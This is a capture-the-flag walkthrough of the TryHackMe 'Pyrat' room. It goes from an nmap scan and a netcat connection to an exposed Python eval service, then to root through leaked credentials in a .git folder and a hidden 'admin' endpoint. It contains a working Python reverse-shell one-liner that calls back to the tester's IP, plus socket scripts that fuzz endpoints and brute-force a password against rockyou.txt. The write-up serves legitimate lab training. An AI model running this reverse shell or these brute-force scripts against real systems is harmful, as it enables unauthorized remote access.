# Pyrat {% embed url="" %} Room Link {% endembed %} This work by Manav G Krishna is licensed under [CC BY-NC 4.0](http://creativecommons.org/licenses/by-nc/4.0/?ref=chooser-v1)

**`Room's Description`**:

**`Machine IP`**: 10.10.192.46 **`Hosts file entry`**: echo '10.10.192.46 pyrat.thm' | sudo tee -a /etc/hosts **`Nmap Scan`**: ```bash nmap -p- -A -v --min-rate 100 -oN pyrat_thm -Pn pyrat.thm Nmap scan report for pyrat.thm (10.10.192.46) Host is up (0.16s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA) | 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA) |_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519) 8000/tcp open http-alt SimpleHTTP/0.6 Python/3.11.2 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-open-proxy: Proxy might be redirecting requests |_http-favicon: Unknown favicon MD5: FBD3DB4BEF1D598ED90E26610F23A63F |_http-title: Site doesn't have a title (text/html; charset=utf-8). |_http-server-header: SimpleHTTP/0.6 Python/3.11.2 | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, JavaRMI, LANDesk-RC, NotesRPC, Socks4, X11Probe, afp, giop: | source code string cannot contain null bytes | FourOhFourRequest, LPDString, SIPOptions: | invalid syntax (, line 1) | GetRequest: | name 'GET' is not defined | HTTPOptions, RTSPRequest: | name 'OPTIONS' is not defined | Help: |_ name 'HELP' is not defined 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8000-TCP:V=7.94SVN%I=7%D=10/3%Time=66FE3CBC%P=x86_64-pc-linux-gnu%r SF:(GenericLines,1,"\n")%r(GetRequest,1A,"name\x20'GET'\x20is\x20not\x20de SF:fined\n")%r(X11Probe,2D,"source\x20code\x20string\x20cannot\x20contain\ SF:x20null\x20bytes\n")%r(FourOhFourRequest,22,"invalid\x20syntax\x20\(,\x20line\x201\)\n")%r(Socks4,2D,"source\x20code\x20string\x20cann SF:ot\x20contain\x20null\x20bytes\n")%r(HTTPOptions,1E,"name\x20'OPTIONS'\ SF:x20is\x20not\x20defined\n")%r(RTSPRequest,1E,"name\x20'OPTIONS'\x20is\x SF:20not\x20defined\n")%r(DNSVersionBindReqTCP,2D,"source\x20code\x20strin SF:g\x20cannot\x20contain\x20null\x20bytes\n")%r(DNSStatusRequestTCP,2D,"s SF:ource\x20code\x20string\x20cannot\x20contain\x20null\x20bytes\n")%r(Hel SF:p,1B,"name\x20'HELP'\x20is\x20not\x20defined\n")%r(LPDString,22,"invali SF:d\x20syntax\x20\(,\x20line\x201\)\n")%r(SIPOptions,22,"invalid\ SF:x20syntax\x20\(,\x20line\x201\)\n")%r(LANDesk-RC,2D,"source\x20 SF:code\x20string\x20cannot\x20contain\x20null\x20bytes\n")%r(NotesRPC,2D, SF:"source\x20code\x20string\x20cannot\x20contain\x20null\x20bytes\n")%r(J SF:avaRMI,2D,"source\x20code\x20string\x20cannot\x20contain\x20null\x20byt SF:es\n")%r(afp,2D,"source\x20code\x20string\x20cannot\x20contain\x20null\ SF:x20bytes\n")%r(giop,2D,"source\x20code\x20string\x20cannot\x20contain\x SF:20null\x20bytes\n"); No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.94SVN%E=4%D=10/3%OT=22%CT=1%CU=42699%PV=Y%DS=2%DC=T%G=Y%TM=66FE OS:3D34%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=101%TI=Z%CI=Z%TS=A)OPS(O1 OS:=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST11NW OS:6%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R= OS:Y%DF=Y%T=40%W=F507%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%R OS:D=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T4(R=Y% OS:DF=Y%T=40%W=0%S=O%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=O%F=AR%O OS:=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40 OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=O%A=Z%F=R%O=%RD=0%Q=) OS:T7(R=Y%DF=Y%T=40%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A= OS:S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RU OS:CK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Uptime guess: 6.108 days (since Fri Sep 27 09:37:53 2024) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=255 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 587/tcp) HOP RTT ADDRESS 1 193.28 ms 10.11.0.1 2 194.14 ms pyrat.thm (10.10.192.46) ``` The scan results show that we have two ports open, that is port **`22`** & **`8000`** . ### Enumeration **`Checking out port 8000`**:

The page tells us to try an even more **`basic connection`**. The only thing that comes to mind is either **`netcat`** or **`telnet`**. Port **`23`** ain't open on the machine, leaving us with just **`netcat`**. We can now connect to the port via **`netcat`**, like so: ```bash nc pyrat.thm 8000 -v ```

We are **`connected`**. From the **`Nmap scan`** results, we notice that the version results for port **`8000`** says - **`SimpleHTTP/0.6 Python/3.11.2`**. This means it is a **`Python-based HTTP`** server. So our interaction with the **`netcat`** connection will highly likely be through **`Python`**. To confirm the same we can execute a simple **`print`** command:

And indeed we get the output. This confirms that we are on a **`Python shell`**. We can also try to find the exact **`Python version`** that could be running: ```python import sys print(sys.version) ```

We are on **`3.8.10`**. So the fingerprinting that **`Nmap`** did (**`3.11.2`**) wasn't accurate. Now that we have tested enough stuff and have fully confirmed that we are having a **`Python`** interaction via the **`netcat`** connection, we can go ahead and try to run a **`Python reverse shell`** command to see what we are presented with. ### Exploitation & Foothold **`Python Reverse Shell`**: ```python import socket, subprocess, os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(('10.11.75.84',4545)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(['/bin/sh','-i']) ``` The **`IP`** specified in the command is the **`tun0`** interface **`IP`**. Now, we can set up a **`netcat`** listener on our **`attacker machine`** and execute the above command.

And we get a connection as **`www-data`**. ### Further Enumeration Firstly we can proceed to **`upgrade`** the current shell a little. **`Commands`**: ```python python3 -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm ```

We land directly within the **`/root`** directory. From the **`/etc/passwd`** file contents we have a user other than root having a **`console`**, that being - **`think`**:

Let us now start **`traversing`** other **`common directories`** hoping to find some good **`information`**. Moreover, the room's description says that we would be able to find some **`credentials`** within a **`well-known folder`**, it could be **`think's password`**!? **`Good directories`** to look into:

**`/opt`** and **`/var`**. **`Checking out /opt`**:

There is a **`.git`** directory. Having access to this folder can help us retrieve some **`code`** or **`sensitive data`**.

There is a file named **`config`**.

And we get the user **`think's`** **`password`**. Now we can **`SSH`** in as **`think`**: **`Command`**: ```bash ssh think@pyrat.thm ```

We get the **`user flag`** in think's **`home`** directory:

Now let us get back to the **`.git`** folder within the **`/opt`** directory as we hadn't fully enumerated it before. Instead of manually examining all those files under the **`.git`** directory, we can use **`Git commands`** to retrieve useful information. We do have the **`git`** utility on the machine:

**`Commands`**: ```bash git rev-list --count --all //Displays the total number of commits ``` ```bash git log //Displays the commit history ``` ```bash git show //Displays details of the commit ```

We have only **`1`** commit.

The **`commit message`** says that a **`shell endpoint`** was added or it could mean the endpoint's name is **`shell`**. The description of the room talks about endpoints and **`shell`** might be an endpoint too.

This is the **`latest`** or the most recent commit (**`HEAD -> master`**). However, the file name **`pyrat.py.old`** suggests that it may be an older version of a script called **`pyrat.py`**. Even though we don't have the full code, what it is mainly saying is this: It allows a server to respond to commands received from us over a **`socket connection`**. The **`switch_case`** function checks the input given by us and decides what action to take. If the input is **`some_endpoint`**, it calls a specific function. If the input is **`shell`**, it gives us access to a command line shell on the server, to execute commands. So we now know that we have an endpoint named **`shell`**. Even though the script might not be the latest code, we can still give it a try by passing this endpoint on the **`netcat`** shell to see if it still stands valid:

And it works. We get a shell as **`www-data`**. Now let us try to see what is up with that **`some_endpoint`**. **`Passing in some_endpoint`**:

So this confirms that this is the **`special endpoint`** that we have to **`fuzz`** for as mentioned in the description of the room. **`These lines`**: ```python if data == 'some_endpoint': get_this_enpoint(client_socket) ``` Says that there is some **`other endpoint`** that is present (**`1st line`**) and that endpoint is being used like so: **`get_[that endpoint]`** (**`2nd line`**). We can now go ahead and **`fuzz`** out that so-called **`special endpoint`** via some simple **`Python scripting`**. ### Privilege Escalation **`Endpoint Fuzzing Script`**: Firstly we have to fetch a **`wordlist`**: {% embed url="" %} Wordlist {% endembed %} I have named the wordlist file: **`endpoints.txt`** ```python import socket def fuzz_endpoints(target_ip, target_port, wordlist): with open(wordlist, 'r') as file: endpoints = file.read().splitlines() for endpoint in endpoints: try: # Create a socket connection with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client_socket: client_socket.connect((target_ip, target_port)) # Send the endpoint client_socket.sendall(endpoint.encode() + b'\n') # Receive the response response = client_socket.recv(4096).decode() # Print the response print(f'Response for {endpoint}: {response}') except Exception as e: print(f'Error connecting to {target_ip}:{target_port} - {str(e)}') if __name__ == "__main__": TARGET_IP = 'pyrat.thm' TARGET_PORT = 8000 WORDLIST = 'endpoints.txt' # Replace with your wordlist path fuzz_endpoints(TARGET_IP, TARGET_PORT, WORDLIST) ``` And we get a **`valid hit`**:

When **`admin`** was passed, the response from the server was - **`Password:`** **`Passing the same`**:

So we now have found out that **`special endpoint`**, that being - **`admin`**. **`Fuzzing`** for the **`password`** is what should be done at this point, **`admin password`**. It is safe to assume the same as the **`endpoint`** is named **`admin`**, so we have to find the **`admin's password`** which we aren't aware of yet. **`Password Fuzzing Script`**: For this, we would be using the **`rockyou.txt`** wordlist. ```python import socket def fuzz_admin_passwords(target_ip, target_port, password_wordlist): admin_endpoint = "admin" with open(password_wordlist, 'r', errors='ignore') as file: passwords = file.read().splitlines() for password in passwords: try: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client_socket: client_socket.connect((target_ip, target_port)) # Send the admin endpoint client_socket.sendall(f"{admin_endpoint}\n".encode()) # Receive the response (for admin prompt) response = client_socket.recv(4096).decode() print(f'Response for {admin_endpoint}: {response}') # Send the password client_socket.sendall(f"{password}\n".encode()) # Receive the response (for password attempt) response = client_socket.recv(4096).decode() # Print the response print(f'Trying password "{password}": {response}') except Exception as e: print(f'Error connecting to {target_ip}:{target_port} - {str(e)}') if __name__ == "__main__": TARGET_IP = 'pyrat.thm' TARGET_PORT = 8000 WORDLIST = '/usr/share/wordlists/rockyou.txt' fuzz_admin_passwords(TARGET_IP, TARGET_PORT, WORDLIST) ``` And we again get a **`hit`**:

The response from the server when the **`valid password`** was tried: **`Welcome Admin!!! Type "shell" to begin`**. Now we can go ahead and enter the **`password`**:

We are now **`root`**. The **`root flag`** can be fetched from the **`/root`** directory.

Room solved!! ### Alternate Approach To Finding The Special Endpoint (admin) This is something I **`overlooked`** when I initially completed the room, in the sense didn't put much thought into that aspect even though I saw it a lot many times on the machine. I will be diving straight into it without any story-building. **`Checking out /var/mail`**:

The **`mail`** talks about a **`RAT`** that was downloaded by a person from a **`GitHub page`** that belongs to **`Jose`**. And we had come across **`Jose's email ID`** a lot many times on the machine, a few instances being in the **`config`** file contents, in the output of the **`git log`**, **`git show`** commands, etc.

That **`email`** when searched led us to the **`GitHub`** account of the **`maker`** of this very room.

There is a **`repo`** called **`PyRAT`** in it: {% embed url="" %} This **`repo`** reveals the **`special endpoint`** which was **`admin`**:

The **`code`** too in the **`repo`** reveals the same and it is the **`same exact code`** that is running on this room as a **`cron job`** as **`root`**:

**`The code`**:

{% embed url="" %} Profile Link {% endembed %}